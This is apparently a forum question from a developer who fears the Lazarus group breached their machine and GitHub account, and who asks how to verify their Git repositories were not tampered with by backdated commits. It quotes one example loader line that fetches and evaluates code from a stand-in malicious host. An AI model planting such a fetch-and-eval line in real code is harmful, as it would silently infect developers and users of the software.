How can I ensure that my Git projects have not been tampered with?
The origin of this whole mess is the news article Beware of Lazarus LinkedIn Recruiting Scam Targeting Org’s To Deliver Malware.
Someone may have breached my system - as in had access to my personal Linux machine for multiple days.
The attackers in question are the Lazarus group, and they are pretty scary - so I'm not taking any chances with them. They have been known to change public Git repos to add and spread malware.
I'm not sure whether they actually did anything, since none of the logs actually show any changes; but still, I remain feeling uneasy - so I nuked everything from my device.
I even bought a new SSD, just in case the firmware of the old one may have been tampered with. I also asked someone with a clean machine to create a new Linux ISO disc image. All that remains are my online accounts (where I've changed all of the passwords and logged out all users), my GitHub account (which the hacker may have infiltrated with a session token or an access token) and a handful of config files, which I vetted individually.
Unfortunately I recently found out it is possible to send commits to GitHub repos and still make it look like nothing ever happened. For instance creating a simple bootloader with (eval(await fetch("mysneakysite.co")) is all that it takes - that way the malware can very easily reinfect me or anyone that works on or uses my software.
What may have been a perfectly clean commit 3 months ago according to GitHub, may actually have been created yesterday and contain a rootkit (an appalling oversight by GitHub, in my opinion; it should display some sort of warning if the history has been revised)!
So now I'm not sure whether I can ever clone my own GitHub repos ever again. I'll be forced to check my current project line-by-line (and show each to an AI), just to start working again - but I can't justify that for every project.
So am I forced to abandon my projects or am I just too paranoid? If I was a hacker, existing Git projects would be a very obvious attack vector - especially since its apparently trivial to cover your tracks.
I contacted GitHub support and asked for a security log - and they gave me a log going back to January 2nd. I can check this to verify that my repos haven't been messed with. They told me that they can't go back further, so if this type of stuff happens to you, act fast!
